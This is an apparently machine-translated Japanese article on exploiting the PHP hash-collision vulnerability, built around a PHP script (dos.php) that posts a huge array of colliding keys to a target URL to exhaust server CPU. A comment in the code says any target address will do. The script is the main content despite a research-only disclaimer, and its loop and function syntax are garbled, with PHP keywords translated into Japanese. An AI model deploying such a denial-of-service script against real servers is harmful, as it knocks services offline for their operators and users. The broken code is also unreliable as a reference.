この記事では、ハッシュ競合の脆弱性を利用して DDoS 攻撃を実行する PHP の手法を主に紹介し、ハッシュを使用して実行する PHP の原理と実装手法を分析します。 DDoS 攻撃を例とともに説明します。必要なものは、友人が参考にすることができます
この記事では、PHP がハッシュ競合の脆弱性を利用して DDoS 攻撃を実行する方法の分析例を提供します。参考のためにみんなで共有してください。具体的な分析は次のとおりです:
まず第一に、声明: この記事の内容は研究と学習のみを目的としており、違法行為には使用しないでください。
前述したように、最近出現したハッシュ テーブルの衝突の脆弱性は、Java、Python、php などを含む多くの一般的な言語に影響を与えています。今夜はその威力を実際に見ていきます。
攻撃原則:
慎重に組み立てられた一連の配列パラメータをターゲット サーバーにポストすることにより、基盤となる言語がサーバーに到達した後に受信した配列パラメーターを処理する際に、この脆弱性の存在により大量の CPU 消費が発生し、最終的にはサーバー リソースの枯渇につながります。 。
派手なトリックは必要ありません。PHP を使用して簡単に実装し、クリックするだけで効果を確認できます。
ファイル: dos.php
?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
//宛先住所 // ターゲットアドレスが存在する限り、それが何のためにあるかは関係ありません $host = 'http://127.0.0.1/test.php'; $data = ''; $size = pow(2, 15); for ($key=0, $max=($size-1)*$size; $key { $data .= '&array[' . $key . }$ret =curl($host, ltrim($data,'&')); var_dump($ret); 関数curl($url, $post, $timeout = 30){ $ch =curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout - 5); curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:')); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); $output =curl_exec($ch); if ($output === false) return false; $info =curl_getinfo($ch); $http_code = $info['http_code']; if ($http_code == 404) return false; curl_close($ch); $output を返す; }
|